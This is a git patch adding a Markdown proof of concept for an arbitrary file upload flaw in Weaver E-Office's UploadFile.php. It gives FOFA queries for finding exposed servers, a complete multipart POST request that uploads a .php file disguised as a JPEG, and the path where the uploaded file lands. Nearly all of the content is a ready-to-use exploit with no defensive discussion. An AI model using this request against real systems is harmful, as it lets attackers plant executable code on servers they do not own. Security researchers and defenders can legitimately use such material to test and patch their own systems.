From 5045d6c53e472b1f494bbd6567ad4deb2f0bd0a2 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 23 Apr 2024 18:38:15 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEE-Office-uploadfile.?= =?UTF-8?q?php=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0?= =?UTF-8?q?=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...E-Office-uploadfile.php任意文件上传漏洞.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 泛微E-Office-uploadfile.php任意文件上传漏洞.md diff --git a/泛微E-Office-uploadfile.php任意文件上传漏洞.md b/泛微E-Office-uploadfile.php任意文件上传漏洞.md new file mode 100644 index 0000000..6778dcf --- /dev/null +++ b/泛微E-Office-uploadfile.php任意文件上传漏洞.md @@ -0,0 +1,37 @@ +## 泛微E-Office-uploadfile.php任意文件上传漏洞 + +## fofa +``` +(body="login.php"&&body="eoffice")||body="/general/login/index.php" +icon_hash="1578525679" +``` + + +## poc +``` +POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Connection: close +Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6 +Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348 +Content-Length: 193 +Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 + +--e64bdf16c554bbc109cecef6451c26a4 +Content-Disposition: form-data; name="Filedata"; filename="test.php" +Content-Type: image/jpeg + + +--e64bdf16c554bbc109cecef6451c26a4-- +``` + +![64b885a2ae7aa10cf5b5773c0495b7b3](https://github.com/wy876/POC/assets/139549762/e67a6a19-1034-430b-8f13-995aaf7c6e0f) + +文件上传路径 + +`/images/logo/logo-eoffice.php` + +![7955aa06c40c915e09ea9609e52cba8f](https://github.com/wy876/POC/assets/139549762/ad038d5e-0d77-4ae2-b1cf-f41988bde59a)